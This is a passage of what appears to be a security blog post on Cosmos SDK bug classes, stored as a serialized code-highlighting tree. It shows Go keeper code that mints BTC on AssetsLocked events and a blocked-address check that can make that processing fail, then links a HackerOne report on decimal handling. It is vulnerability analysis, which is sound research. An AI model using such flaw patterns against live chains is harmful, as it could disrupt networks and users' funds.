nil",{"type":28,"tag":116,"props":81539,"children":81540},{"style":266},[81541],{"type":33,"value":1291},{"type":28,"tag":116,"props":81543,"children":81544},{"class":245,"line":665},[81545,81549,81553,81557,81562,81566,81571,81575,81580,81584,81588],{"type":28,"tag":116,"props":81546,"children":81547},{"style":260},[81548],{"type":33,"value":1017},{"type":28,"tag":116,"props":81550,"children":81551},{"style":376},[81552],{"type":33,"value":81537},{"type":28,"tag":116,"props":81554,"children":81555},{"style":266},[81556],{"type":33,"value":825},{"type":28,"tag":116,"props":81558,"children":81559},{"style":272},[81560],{"type":33,"value":81561},"fmt",{"type":28,"tag":116,"props":81563,"children":81564},{"style":266},[81565],{"type":33,"value":141},{"type":28,"tag":116,"props":81567,"children":81568},{"style":282},[81569],{"type":33,"value":81570},"Errorf",{"type":28,"tag":116,"props":81572,"children":81573},{"style":266},[81574],{"type":33,"value":313},{"type":28,"tag":116,"props":81576,"children":81577},{"style":563},[81578],{"type":33,"value":81579},"\"cannot accept AssetsLocked events: %w\"",{"type":28,"tag":116,"props":81581,"children":81582},{"style":266},[81583],{"type":33,"value":825},{"type":28,"tag":116,"props":81585,"children":81586},{"style":272},[81587],{"type":33,"value":1907},{"type":28,"tag":116,"props":81589,"children":81590},{"style":266},[81591],{"type":33,"value":2830},{"type":28,"tag":116,"props":81593,"children":81594},{"class":245,"line":713},[81595],{"type":28,"tag":116,"props":81596,"children":81597},{"style":266},[81598],{"type":33,"value":1954},{"type":28,"tag":116,"props":81600,"children":81601},{"class":245,"line":750},[81602],{"type":28,"tag":116,"props":81603,"children":81604},{"style":370},[81605],{"type":33,"value":81461},{"type":28,"tag":116,"props":81607,"children":81608},{"class":245,"line":779},[81609],{"type":28,"tag":116,"props":81610,"children":81611},{"style":266},[81612],{"type":33,"value":3025},{"type":28,"tag":116,"props":81614,"children":81615},{"class":245,"line":796},[81616],{"type":28,"tag":116,"props":81617,"children":81618},{"style":266},[81619],{"type":33,"value":406},{"type":28,"tag":116,"props":81621,"children":81622},{"class":245,"line":847},[81623],{"type":28,"tag":116,"props":81624,"children":81625},{"emptyLinePlaceholder":19},[81626],{"type":33,"value":1044},{"type":28,"tag":116,"props":81628,"children":81629},{"class":245,"line":898},[81630,81634,81638,81642,81646,81650,81654],{"type":28,"tag":116,"props":81631,"children":81632},{"style":376},[81633],{"type":33,"value":75920},{"type":28,"tag":116,"props":81635,"children":81636},{"style":266},[81637],{"type":33,"value":269},{"type":28,"tag":116,"props":81639,"children":81640},{"style":272},[81641],{"type":33,"value":80747},{"type":28,"tag":116,"props":81643,"children":81644},{"style":339},[81645],{"type":33,"value":79564},{"type":28,"tag":116,"props":81647,"children":81648},{"style":266},[81649],{"type":33,"value":1609},{"type":28,"tag":116,"props":81651,"children":81652},{"style":282},[81653],{"type":33,"value":81496},{"type":28,"tag":116,"props":81655,"children":81656},{"style":266},[81657],{"type":33,"value":3133},{"type":28,"tag":116,"props":81659,"children":81660},{"class":245,"line":907},[81661,81665,81669,81673,81677],{"type":28,"tag":116,"props":81662,"children":81663},{"style":272},[81664],{"type":33,"value":19887},{"type":28,"tag":116,"props":81666,"children":81667},{"style":339},[81668],{"type":33,"value":78261},{"type":28,"tag":116,"props":81670,"children":81671},{"style":266},[81672],{"type":33,"value":141},{"type":28,"tag":116,"props":81674,"children":81675},{"style":339},[81676],{"type":33,"value":75969},{"type":28,"tag":116,"props":81678,"children":81679},{"style":266},[81680],{"type":33,"value":3178},{"type":28,"tag":116,"props":81682,"children":81683},{"class":245,"line":981},[81684,81689,81693,81697,81702],{"type":28,"tag":116,"props":81685,"children":81686},{"style":272},[81687],{"type":33,"value":81688},"    events",{"type":28,"tag":116,"props":81690,"children":81691},{"style":339},[81692],{"type":33,"value":77795},{"type":28,"tag":116,"props":81694,"children":81695},{"style":266},[81696],{"type":33,"value":141},{"type":28,"tag":116,"props":81698,"children":81699},{"style":339},[81700],{"type":33,"value":81701},"AssetsLockedEvents",{"type":28,"tag":116,"props":81703,"children":81704},{"style":266},[81705],{"type":33,"value":3178},{"type":28,"tag":116,"props":81707,"children":81708},{"class":245,"line":1011},[81709,81713,81717],{"type":28,"tag":116,"props":81710,"children":81711},{"style":266},[81712],{"type":33,"value":1609},{"type":28,"tag":116,"props":81714,"children":81715},{"style":339},[81716],{"type":33,"value":974},{"type":28,"tag":116,"props":81718,"children":81719},{"style":266},[81720],{"type":33,"value":1291},{"type":28,"tag":116,"props":81722,"children":81723},{"class":245,"line":1029},[81724],{"type":28,"tag":116,"props":81725,"children":81726},{"style":370},[81727],{"type":33,"value":20003},{"type":28,"tag":116,"props":81729,"children":81730},{"class":245,"line":1038},[81731,81735,81739,81743,81747,81751,81755,81760],{"type":28,"tag":116,"props":81732,"children":81733},{"style":260},[81734],{"type":33,"value":2703},{"type":28,"tag":116,"props":81736,"children":81737},{"style":272},[81738],{"type":33,"value":2708},{"type":28,"tag":116,"props":81740,"children":81741},{"style":266},[81742],{"type":33,"value":825},{"type":28,"tag":116,"props":81744,"children":81745},{"style":272},[81746],{"type":33,"value":839},{"type":28,"tag":116,"props":81748,"children":81749},{"style":370},[81750],{"type":33,"value":76036},{"type":28,"tag":116,"props":81752,"children":81753},{"style":260},[81754],{"type":33,"value":77019},{"type":28,"tag":116,"props":81756,"children":81757},{"style":272},[81758],{"type":33,"value":81759}," events",{"type":28,"tag":116,"props":81761,"children":81762},{"style":266},[81763],{"type":33,"value":1291},{"type":28,"tag":116,"props":81765,"children":81766},{"class":245,"line":1047},[81767,81772,81776,81780,81784,81788,81792,81797,81801,81805,81809,81814],{"type":28,"tag":116,"props":81768,"children":81769},{"style":272},[81770],{"type":33,"value":81771},"        recipient",{"type":28,"tag":116,"props":81773,"children":81774},{"style":266},[81775],{"type":33,"value":825},{"type":28,"tag":116,"props":81777,"children":81778},{"style":272},[81779],{"type":33,"value":1907},{"type":28,"tag":116,"props":81781,"children":81782},{"style":370},[81783],{"type":33,"value":76036},{"type":28,"tag":116,"props":81785,"children":81786},{"style":272},[81787],{"type":33,"value":78261},{"type":28,"tag":116,"props":81789,"children":81790},{"style":266},[81791],{"type":33,"value":141},{"type":28,"tag":116,"props":81793,"children":81794},{"style":282},[81795],{"type":33,"value":81796},"AccAddressFromBech32",{"type":28,"tag":116,"props":81798,"children":81799},{"style":266},[81800],{"type":33,"value":313},{"type":28,"tag":116,"props":81802,"children":81803},{"style":272},[81804],{"type":33,"value":839},{"type":28,"tag":116,"props":81806,"children":81807},{"style":266},[81808],{"type":33,"value":141},{"type":28,"tag":116,"props":81810,"children":81811},{"style":272},[81812],{"type":33,"value":81813},"Recipient",{"type":28,"tag":116,"props":81815,"children":81816},{"style":266},[81817],{"type":33,"value":2830},{"type":28,"tag":116,"props":81819,"children":81820},{"class":245,"line":1071},[81821,81825,81829,81833,81837],{"type":28,"tag":116,"props":81822,"children":81823},{"style":260},[81824],{"type":33,"value":2943},{"type":28,"tag":116,"props":81826,"children":81827},{"style":272},[81828],{"type":33,"value":48142},{"type":28,"tag":116,"props":81830,"children":81831},{"style":370},[81832],{"type":33,"value":64006},{"type":28,"tag":116,"props":81834,"children":81835},{"style":376},[81836],{"type":33,"value":81537},{"type":28,"tag":116,"props":81838,"children":81839},{"style":266},[81840],{"type":33,"value":1291},{"type":28,"tag":116,"props":81842,"children":81843},{"class":245,"line":1137},[81844,81848,81853,81857,81861,81865,81870,81874,81878],{"type":28,"tag":116,"props":81845,"children":81846},{"style":260},[81847],{"type":33,"value":1017},{"type":28,"tag":116,"props":81849,"children":81850},{"style":272},[81851],{"type":33,"value":81852}," fmt",{"type":28,"tag":116,"props":81854,"children":81855},{"style":266},[81856],{"type":33,"value":141},{"type":28,"tag":116,"props":81858,"children":81859},{"style":282},[81860],{"type":33,"value":81570},{"type":28,"tag":116,"props":81862,"children":81863},{"style":266},[81864],{"type":33,"value":313},{"type":28,"tag":116,"props":81866,"children":81867},{"style":563},[81868],{"type":33,"value":81869},"\"failed to parse recipient address: %w\"",{"type":28,"tag":116,"props":81871,"children":81872},{"style":266},[81873],{"type":33,"value":825},{"type":28,"tag":116,"props":81875,"children":81876},{"style":272},[81877],{"type":33,"value":1907},{"type":28,"tag":116,"props":81879,"children":81880},{"style":266},[81881],{"type":33,"value":2830},{"type":28,"tag":116,"props":81883,"children":81884},{"class":245,"line":1181},[81885],{"type":28,"tag":116,"props":81886,"children":81887},{"style":266},[81888],{"type":33,"value":1954},{"type":28,"tag":116,"props":81890,"children":81891},{"class":245,"line":1212},[81892],{"type":28,"tag":116,"props":81893,"children":81894},{"emptyLinePlaceholder":19},[81895],{"type":33,"value":1044},{"type":28,"tag":116,"props":81897,"children":81898},{"class":245,"line":1254},[81899,81903,81908,81912,81917,81921,81925,81929,81934,81938,81943],{"type":28,"tag":116,"props":81900,"children":81901},{"style":260},[81902],{"type":33,"value":2943},{"type":28,"tag":116,"props":81904,"children":81905},{"style":272},[81906],{"type":33,"value":81907}," bytes",{"type":28,"tag":116,"props":81909,"children":81910},{"style":266},[81911],{"type":33,"value":141},{"type":28,"tag":116,"props":81913,"children":81914},{"style":282},[81915],{"type":33,"value":81916},"Equal",{"type":28,"tag":116,"props":81918,"children":81919},{"style":266},[81920],{"type":33,"value":313},{"type":28,"tag":116,"props":81922,"children":81923},{"style":272},[81924],{"type":33,"value":839},{"type":28,"tag":116,"props":81926,"children":81927},{"style":266},[81928],{"type":33,"value":141},{"type":28,"tag":116,"props":81930,"children":81931},{"style":282},[81932],{"type":33,"value":81933},"TokenBytes",{"type":28,"tag":116,"props":81935,"children":81936},{"style":266},[81937],{"type":33,"value":18038},{"type":28,"tag":116,"props":81939,"children":81940},{"style":272},[81941],{"type":33,"value":81942},"sourceBTCToken",{"type":28,"tag":116,"props":81944,"children":81945},{"style":266},[81946],{"type":33,"value":844},{"type":28,"tag":116,"props":81948,"children":81949},{"class":245,"line":1262},[81950,81955,81959,81963,81967,81972,81976,81980,81984,81988,81992,81996,82000,82004],{"type":28,"tag":116,"props":81951,"children":81952},{"style":272},[81953],{"type":33,"value":81954},"            err",{"type":28,"tag":116,"props":81956,"children":81957},{"style":370},[81958],{"type":33,"value":2226},{"type":28,"tag":116,"props":81960,"children":81961},{"style":272},[81962],{"type":33,"value":80875},{"type":28,"tag":116,"props":81964,"children":81965},{"style":266},[81966],{"type":33,"value":141},{"type":28,"tag":116,"props":81968,"children":81969},{"style":282},[81970],{"type":33,"value":81971},"mintBTC",{"type":28,"tag":116,"props":81973,"children":81974},{"style":266},[81975],{"type":33,"value":313},{"type":28,"tag":116,"props":81977,"children":81978},{"style":272},[81979],{"type":33,"value":19944},{"type":28,"tag":116,"props":81981,"children":81982},{"style":266},[81983],{"type":33,"value":825},{"type":28,"tag":116,"props":81985,"children":81986},{"style":272},[81987],{"type":33,"value":81270},{"type":28,"tag":116,"props":81989,"children":81990},{"style":266},[81991],{"type":33,"value":825},{"type":28,"tag":116,"props":81993,"children":81994},{"style":272},[81995],{"type":33,"value":839},{"type":28,"tag":116,"props":81997,"children":81998},{"style":266},[81999],{"type":33,"value":141},{"type":28,"tag":116,"props":82001,"children":82002},{"style":272},[82003],{"type":33,"value":78675},{"type":28,"tag":116,"props":82005,"children":82006},{"style":266},[82007],{"type":33,"value":2830},{"type":28,"tag":116,"props":82009,"children":82010},{"class":245,"line":1294},[82011,82015,82019,82023,82027],{"type":28,"tag":116,"props":82012,"children":82013},{"style":260},[82014],{"type":33,"value":58419},{"type":28,"tag":116,"props":82016,"children":82017},{"style":272},[82018],{"type":33,"value":48142},{"type":28,"tag":116,"props":82020,"children":82021},{"style":370},[82022],{"type":33,"value":64006},{"type":28,"tag":116,"props":82024,"children":82025},{"style":376},[82026],{"type":33,"value":81537},{"type":28,"tag":116,"props":82028,"children":82029},{"style":266},[82030],{"type":33,"value":1291},{"type":28,"tag":116,"props":82032,"children":82033},{"class":245,"line":1334},[82034,82038,82042,82046,82050],{"type":28,"tag":116,"props":82035,"children":82036},{"style":260},[82037],{"type":33,"value":60347},{"type":28,"tag":116,"props":82039,"children":82040},{"style":272},[82041],{"type":33,"value":81852},{"type":28,"tag":116,"props":82043,"children":82044},{"style":266},[82045],{"type":33,"value":141},{"type":28,"tag":116,"props":82047,"children":82048},{"style":282},[82049],{"type":33,"value":81570},{"type":28,"tag":116,"props":82051,"children":82052},{"style":266},[82053],{"type":33,"value":3133},{"type":28,"tag":116,"props":82055,"children":82056},{"class":245,"line":1372},[82057,82062],{"type":28,"tag":116,"props":82058,"children":82059},{"style":563},[82060],{"type":33,"value":82061},"                    \"failed to mint BTC for event %v: %w\"",{"type":28,"tag":116,"props":82063,"children":82064},{"style":266},[82065],{"type":33,"value":3178},{"type":28,"tag":116,"props":82067,"children":82068},{"class":245,"line":1381},[82069,82074,82078,82083],{"type":28,"tag":116,"props":82070,"children":82071},{"style":272},[82072],{"type":33,"value":82073},"                    event",{"type":28,"tag":116,"props":82075,"children":82076},{"style":266},[82077],{"type":33,"value":141},{"type":28,"tag":116,"props":82079,"children":82080},{"style":272},[82081],{"type":33,"value":82082},"Sequence",{"type":28,"tag":116,"props":82084,"children":82085},{"style":266},[82086],{"type":33,"value":3178},{"type":28,"tag":116,"props":82088,"children":82089},{"class":245,"line":1389},[82090,82095],{"type":28,"tag":116,"props":82091,"children":82092},{"style":272},[82093],{"type":33,"value":82094},"                    err",{"type":28,"tag":116,"props":82096,"children":82097},{"style":266},[82098],{"type":33,"value":3178},{"type":28,"tag":116,"props":82100,"children":82101},{"class":245,"line":1425},[82102],{"type":28,"tag":116,"props":82103,"children":82104},{"style":266},[82105],{"type":33,"value":82106},"                )\n",{"type":28,"tag":116,"props":82108,"children":82109},{"class":245,"line":1448},[82110],{"type":28,"tag":116,"props":82111,"children":82112},{"style":266},[82113],{"type":33,"value":58503},{"type":28,"tag":116,"props":82115,"children":82116},{"class":245,"line":1456},[82117,82121,82125],{"type":28,"tag":116,"props":82118,"children":82119},{"style":266},[82120],{"type":33,"value":2981},{"type":28,"tag":116,"props":82122,"children":82123},{"style":260},[82124],{"type":33,"value":2986},{"type":28,"tag":116,"props":82126,"children":82127},{"style":266},[82128],{"type":33,"value":1291},{"type":28,"tag":116,"props":82130,"children":82131},{"class":245,"line":1520},[82132],{"type":28,"tag":116,"props":82133,"children":82134},{"style":370},[82135],{"type":33,"value":82136},"            ...\n",{"type":28,"tag":116,"props":82138,"children":82139},{"class":245,"line":1580},[82140],{"type":28,"tag":116,"props":82141,"children":82142},{"style":266},[82143],{"type":33,"value":1954},{"type":28,"tag":116,"props":82145,"children":82146},{"class":245,"line":1620},[82147],{"type":28,"tag":116,"props":82148,"children":82149},{"style":266},[82150],{"type":33,"value":3025},{"type":28,"tag":116,"props":82152,"children":82153},{"class":245,"line":1668},[82154],{"type":28,"tag":116,"props":82155,"children":82156},{"style":370},[82157],{"type":33,"value":20003},{"type":28,"tag":116,"props":82159,"children":82160},{"class":245,"line":1677},[82161],{"type":28,"tag":116,"props":82162,"children":82163},{"style":266},[82164],{"type":33,"value":406},{"type":28,"tag":116,"props":82166,"children":82167},{"class":245,"line":1685},[82168],{"type":28,"tag":116,"props":82169,"children":82170},{"emptyLinePlaceholder":19},[82171],{"type":33,"value":1044},{"type":28,"tag":116,"props":82173,"children":82174},{"class":245,"line":1729},[82175,82179,82183,82187,82191,82195,82199],{"type":28,"tag":116,"props":82176,"children":82177},{"style":376},[82178],{"type":33,"value":75920},{"type":28,"tag":116,"props":82180,"children":82181},{"style":266},[82182],{"type":33,"value":269},{"type":28,"tag":116,"props":82184,"children":82185},{"style":272},[82186],{"type":33,"value":80747},{"type":28,"tag":116,"props":82188,"children":82189},{"style":339},[82190],{"type":33,"value":79564},{"type":28,"tag":116,"props":82192,"children":82193},{"style":266},[82194],{"type":33,"value":1609},{"type":28,"tag":116,"props":82196,"children":82197},{"style":282},[82198],{"type":33,"value":81971},{"type":28,"tag":116,"props":82200,"children":82201},{"style":266},[82202],{"type":33,"value":3133},{"type":28,"tag":116,"props":82204,"children":82205},{"class":245,"line":1764},[82206,82210,82214,82218,82222],{"type":28,"tag":116,"props":82207,"children":82208},{"style":272},[82209],{"type":33,"value":19887},{"type":28,"tag":116,"props":82211,"children":82212},{"style":339},[82213],{"type":33,"value":78261},{"type":28,"tag":116,"props":82215,"children":82216},{"style":266},[82217],{"type":33,"value":141},{"type":28,"tag":116,"props":82219,"children":82220},{"style":339},[82221],{"type":33,"value":75969},{"type":28,"tag":116,"props":82223,"children":82224},{"style":266},[82225],{"type":33,"value":3178},{"type":28,"tag":116,"props":82227,"children":82228},{"class":245,"line":1896},[82229,82234,82238,82242,82247],{"type":28,"tag":116,"props":82230,"children":82231},{"style":272},[82232],{"type":33,"value":82233},"    recipient",{"type":28,"tag":116,"props":82235,"children":82236},{"style":339},[82237],{"type":33,"value":78261},{"type":28,"tag":116,"props":82239,"children":82240},{"style":266},[82241],{"type":33,"value":141},{"type":28,"tag":116,"props":82243,"children":82244},{"style":339},[82245],{"type":33,"value":82246},"AccAddress",{"type":28,"tag":116,"props":82248,"children":82249},{"style":266},[82250],{"type":33,"value":3178},{"type":28,"tag":116,"props":82252,"children":82253},{"class":245,"line":1932},[82254,82258,82263,82267,82272],{"type":28,"tag":116,"props":82255,"children":82256},{"style":272},[82257],{"type":33,"value":61201},{"type":28,"tag":116,"props":82259,"children":82260},{"style":339},[82261],{"type":33,"value":82262}," math",{"type":28,"tag":116,"props":82264,"children":82265},{"style":266},[82266],{"type":33,"value":141},{"type":28,"tag":116,"props":82268,"children":82269},{"style":339},[82270],{"type":33,"value":82271},"Int",{"type":28,"tag":116,"props":82273,"children":82274},{"style":266},[82275],{"type":33,"value":3178},{"type":28,"tag":116,"props":82277,"children":82278},{"class":245,"line":1940},[82279,82283,82287],{"type":28,"tag":116,"props":82280,"children":82281},{"style":266},[82282],{"type":33,"value":1609},{"type":28,"tag":116,"props":82284,"children":82285},{"style":339},[82286],{"type":33,"value":974},{"type":28,"tag":116,"props":82288,"children":82289},{"style":266},[82290],{"type":33,"value":1291},{"type":28,"tag":116,"props":82292,"children":82293},{"class":245,"line":1948},[82294],{"type":28,"tag":116,"props":82295,"children":82296},{"style":370},[82297],{"type":33,"value":20003},{"type":28,"tag":116,"props":82299,"children":82300},{"class":245,"line":1957},[82301,82306,82310,82314,82318,82323,82327,82331],{"type":28,"tag":116,"props":82302,"children":82303},{"style":272},[82304],{"type":33,"value":82305},"    err",{"type":28,"tag":116,"props":82307,"children":82308},{"style":370},[82309],{"type":33,"value":2226},{"type":28,"tag":116,"props":82311,"children":82312},{"style":272},[82313],{"type":33,"value":80875},{"type":28,"tag":116,"props":82315,"children":82316},{"style":266},[82317],{"type":33,"value":141},{"type":28,"tag":116,"props":82319,"children":82320},{"style":272},[82321],{"type":33,"value":82322},"bankKeeper",{"type":28,"tag":116,"props":82324,"children":82325},{"style":266},[82326],{"type":33,"value":141},{"type":28,"tag":116,"props":82328,"children":82329},{"style":282},[82330],{"type":33,"value":81262},{"type":28,"tag":116,"props":82332,"children":82333},{"style":266},[82334],{"type":33,"value":3133},{"type":28,"tag":116,"props":82336,"children":82337},{"class":245,"line":1970},[82338,82342],{"type":28,"tag":116,"props":82339,"children":82340},{"style":272},[82341],{"type":33,"value":25841},{"type":28,"tag":116,"props":82343,"children":82344},{"style":266},[82345],{"type":33,"value":3178},{"type":28,"tag":116,"props":82347,"children":82348},{"class":245,"line":1987},[82349,82354,82358,82363],{"type":28,"tag":116,"props":82350,"children":82351},{"style":272},[82352],{"type":33,"value":82353},"        types",{"type":28,"tag":116,"props":82355,"children":82356},{"style":266},[82357],{"type":33,"value":141},{"type":28,"tag":116,"props":82359,"children":82360},{"style":272},[82361],{"type":33,"value":82362},"ModuleName",{"type":28,"tag":116,"props":82364,"children":82365},{"style":266},[82366],{"type":33,"value":3178},{"type":28,"tag":116,"props":82368,"children":82369},{"class":245,"line":2003},[82370,82374],{"type":28,"tag":116,"props":82371,"children":82372},{"style":272},[82373],{"type":33,"value":81771},{"type":28,"tag":116,"props":82375,"children":82376},{"style":266},[82377],{"type":33,"value":3178},{"type":28,"tag":116,"props":82379,"children":82380},{"class":245,"line":31949},[82381,82386],{"type":28,"tag":116,"props":82382,"children":82383},{"style":272},[82384],{"type":33,"value":82385},"        coins",{"type":28,"tag":116,"props":82387,"children":82388},{"style":266},[82389],{"type":33,"value":3178},{"type":28,"tag":116,"props":82391,"children":82392},{"class":245,"line":80570},[82393],{"type":28,"tag":116,"props":82394,"children":82395},{"style":266},[82396],{"type":33,"value":23574},{"type":28,"tag":116,"props":82398,"children":82399},{"class":245,"line":80583},[82400,82404,82408,82412,82416],{"type":28,"tag":116,"props":82401,"children":82402},{"style":260},[82403],{"type":33,"value":11947},{"type":28,"tag":116,"props":82405,"children":82406},{"style":272},[82407],{"type":33,"value":48142},{"type":28,"tag":116,"props":82409,"children":82410},{"style":370},[82411],{"type":33,"value":64006},{"type":28,"tag":116,"props":82413,"children":82414},{"style":376},[82415],{"type":33,"value":81537},{"type":28,"tag":116,"props":82417,"children":82418},{"style":266},[82419],{"type":33,"value":1291},{"type":28,"tag":116,"props":82421,"children":82422},{"class":245,"line":80591},[82423,82427,82431,82435,82439,82443,82448,82452,82456],{"type":28,"tag":116,"props":82424,"children":82425},{"style":260},[82426],{"type":33,"value":15405},{"type":28,"tag":116,"props":82428,"children":82429},{"style":272},[82430],{"type":33,"value":81852},{"type":28,"tag":116,"props":82432,"children":82433},{"style":266},[82434],{"type":33,"value":141},{"type":28,"tag":116,"props":82436,"children":82437},{"style":282},[82438],{"type":33,"value":81570},{"type":28,"tag":116,"props":82440,"children":82441},{"style":266},[82442],{"type":33,"value":313},{"type":28,"tag":116,"props":82444,"children":82445},{"style":563},[82446],{"type":33,"value":82447},"\"failed to send coins: %w\"",{"type":28,"tag":116,"props":82449,"children":82450},{"style":266},[82451],{"type":33,"value":825},{"type":28,"tag":116,"props":82453,"children":82454},{"style":272},[82455],{"type":33,"value":1907},{"type":28,"tag":116,"props":82457,"children":82458},{"style":266},[82459],{"type":33,"value":2830},{"type":28,"tag":116,"props":82461,"children":82462},{"class":245,"line":80599},[82463],{"type":28,"tag":116,"props":82464,"children":82465},{"style":266},[82466],{"type":33,"value":3025},{"type":28,"tag":116,"props":82468,"children":82469},{"class":245,"line":80607},[82470],{"type":28,"tag":116,"props":82471,"children":82472},{"style":370},[82473],{"type":33,"value":20003},{"type":28,"tag":116,"props":82475,"children":82476},{"class":245,"line":80647},[82477],{"type":28,"tag":116,"props":82478,"children":82479},{"style":266},[82480],{"type":33,"value":406},{"type":28,"tag":234,"props":82482,"children":82484},{"code":82483,"language":75784,"meta":7,"className":75785,"style":7},"func (k BaseKeeper) SendCoinsFromModuleToAccount(\n ctx context.Context, senderModule string, recipientAddr sdk.AccAddress, amt sdk.Coins,\n) error {\n ...\n if k.BlockedAddr(recipientAddr) {\n  return errorsmod.Wrapf(sdkerrors.ErrUnauthorized, \"%s is not allowed to receive funds\", recipientAddr)\n }\n ...\n}\n",[82485],{"type":28,"tag":98,"props":82486,"children":82487},{"__ignoreMap":7},[82488,82520,82599,82614,82622,82653,82711,82718,82725],{"type":28,"tag":116,"props":82489,"children":82490},{"class":245,"line":246},[82491,82495,82499,82503,82508,82512,82516],{"type":28,"tag":116,"props":82492,"children":82493},{"style":376},[82494],{"type":33,"value":75920},{"type":28,"tag":116,"props":82496,"children":82497},{"style":266},[82498],{"type":33,"value":269},{"type":28,"tag":116,"props":82500,"children":82501},{"style":272},[82502],{"type":33,"value":80747},{"type":28,"tag":116,"props":82504,"children":82505},{"style":339},[82506],{"type":33,"value":82507},"BaseKeeper",{"type":28,"tag":116,"props":82509,"children":82510},{"style":266},[82511],{"type":33,"value":1609},{"type":28,"tag":116,"props":82513,"children":82514},{"style":282},[82515],{"type":33,"value":81262},{"type":28,"tag":116,"props":82517,"children":82518},{"style":266},[82519],{"type":33,"value":3133},{"type":28,"tag":116,"props":82521,"children":82522},{"class":245,"line":256},[82523,82527,82531,82535,82539,82543,82548,82552,82556,82561,82565,82569,82573,82577,82582,82586,82590,82595],{"type":28,"tag":116,"props":82524,"children":82525},{"style":272},[82526],{"type":33,"value":25498},{"type":28,"tag":116,"props":82528,"children":82529},{"style":339},[82530],{"type":33,"value":75960},{"type":28,"tag":116,"props":82532,"children":82533},{"style":266},[82534],{"type":33,"value":141},{"type":28,"tag":116,"props":82536,"children":82537},{"style":339},[82538],{"type":33,"value":75969},{"type":28,"tag":116,"props":82540,"children":82541},{"style":266},[82542],{"type":33,"value":825},{"type":28,"tag":116,"props":82544,"children":82545},{"style":272},[82546],{"type":33,"value":82547},"senderModule",{"type":28,"tag":116,"props":82549,"children":82550},{"style":339},[82551],{"type":33,"value":35655},{"type":28,"tag":116,"props":82553,"children":82554},{"style":266},[82555],{"type":33,"value":825},{"type":28,"tag":116,"props":82557,"children":82558},{"style":272},[82559],{"type":33,"value":82560},"recipientAddr",{"type":28,"tag":116,"props":82562,"children":82563},{"style":339},[82564],{"type":33,"value":78261},{"type":28,"tag":116,"props":82566,"children":82567},{"style":266},[82568],{"type":33,"value":141},{"type":28,"tag":116,"props":82570,"children":82571},{"style":339},[82572],{"type":33,"value":82246},{"type":28,"tag":116,"props":82574,"children":82575},{"style":266},[82576],{"type":33,"value":825},{"type":28,"tag":116,"props":82578,"children":82579},{"style":272},[82580],{"type":33,"value":82581},"amt",{"type":28,"tag":116,"props":82583,"children":82584},{"style":339},[82585],{"type":33,"value":78261},{"type":28,"tag":116,"props":82587,"children":82588},{"style":266},[82589],{"type":33,"value":141},{"type":28,"tag":116,"props":82591,"children":82592},{"style":339},[82593],{"type":33,"value":82594},"Coins",{"type":28,"tag":116,"props":82596,"children":82597},{"style":266},[82598],{"type":33,"value":3178},{"type":28,"tag":116,"props":82600,"children":82601},{"class":245,"line":293},[82602,82606,82610],{"type":28,"tag":116,"props":82603,"children":82604},{"style":266},[82605],{"type":33,"value":1609},{"type":28,"tag":116,"props":82607,"children":82608},{"style":339},[82609],{"type":33,"value":974},{"type":28,"tag":116,"props":82611,"children":82612},{"style":266},[82613],{"type":33,"value":1291},{"type":28,"tag":116,"props":82615,"children":82616},{"class":245,"line":361},[82617],{"type":28,"tag":116,"props":82618,"children":82619},{"style":370},[82620],{"type":33,"value":82621}," ...\n",{"type":28,"tag":116,"props":82623,"children":82624},{"class":245,"line":387},[82625,82629,82633,82637,82641,82645,82649],{"type":28,"tag":116,"props":82626,"children":82627},{"style":260},[82628],{"type":33,"value":15449},{"type":28,"tag":116,"props":82630,"children":82631},{"style":272},[82632],{"type":33,"value":80875},{"type":28,"tag":116,"props":82634,"children":82635},{"style":266},[82636],{"type":33,"value":141},{"type":28,"tag":116,"props":82638,"children":82639},{"style":282},[82640],{"type":33,"value":81278},{"type":28,"tag":116,"props":82642,"children":82643},{"style":266},[82644],{"type":33,"value":313},{"type":28,"tag":116,"props":82646,"children":82647},{"style":272},[82648],{"type":33,"value":82560},{"type":28,"tag":116,"props":82650,"children":82651},{"style":266},[82652],{"type":33,"value":844},{"type":28,"tag":116,"props":82654,"children":82655},{"class":245,"line":400},[82656,82660,82665,82669,82673,82677,82681,82685,82690,82694,82699,82703,82707],{"type":28,"tag":116,"props":82657,"children":82658},{"style":260},[82659],{"type":33,"value":38820},{"type":28,"tag":116,"props":82661,"children":82662},{"style":272},[82663],{"type":33,"value":82664}," errorsmod",{"type":28,"tag":116,"props":82666,"children":82667},{"style":266},[82668],{"type":33,"value":141},{"type":28,"tag":116,"props":82670,"children":82671},{"style":282},[82672],{"type":33,"value":80529},{"type":28,"tag":116,"props":82674,"children":82675},{"style":266},[82676],{"type":33,"value":313},{"type":28,"tag":116,"props":82678,"children":82679},{"style":272},[82680],{"type":33,"value":80191},{"type":28,"tag":116,"props":82682,"children":82683},{"style":266},[82684],{"type":33,"value":141},{"type":28,"tag":116,"props":82686,"children":82687},{"style":272},[82688],{"type":33,"value":82689},"ErrUnauthorized",{"type":28,"tag":116,"props":82691,"children":82692},{"style":266},[82693],{"type":33,"value":825},{"type":28,"tag":116,"props":82695,"children":82696},{"style":563},[82697],{"type":33,"value":82698},"\"%s is not allowed to receive funds\"",{"type":28,"tag":116,"props":82700,"children":82701},{"style":266},[82702],{"type":33,"value":825},{"type":28,"tag":116,"props":82704,"children":82705},{"style":272},[82706],{"type":33,"value":82560},{"type":28,"tag":116,"props":82708,"children":82709},{"style":266},[82710],{"type":33,"value":2830},{"type":28,"tag":116,"props":82712,"children":82713},{"class":245,"line":614},[82714],{"type":28,"tag":116,"props":82715,"children":82716},{"style":266},[82717],{"type":33,"value":9264},{"type":28,"tag":116,"props":82719,"children":82720},{"class":245,"line":631},[82721],{"type":28,"tag":116,"props":82722,"children":82723},{"style":370},[82724],{"type":33,"value":82621},{"type":28,"tag":116,"props":82726,"children":82727},{"class":245,"line":665},[82728],{"type":28,"tag":116,"props":82729,"children":82730},{"style":266},[82731],{"type":33,"value":406},{"type":28,"tag":29,"props":82733,"children":82734},{},[82735,82737,82744],{"type":33,"value":82736},"This shows even well-known bug classes still resurface from time to time due to unforeseen invariant violations. Additional examples include ",{"type":28,"tag":87,"props":82738,"children":82741},{"href":82739,"rel":82740},"https://hackerone.com/reports/3018307",[91],[82742],{"type":33,"value":82743},"improper decimal handling in the group module",{"type":33,"value":141},{"type":28,"tag":63,"props":82746,"children":82748},{"id":82747},"same-same-but-different",[82749],{"type":33,"value":82750},"Same, Same... But Different",{"type":28,"tag":29,"props":82752,"children":82753},{},[82754,82756,82762,82763,82769,82770,82776,82777,82783],{"type":33,"value":82755},"Cosmos exposes several consensus-level interfaces, such as 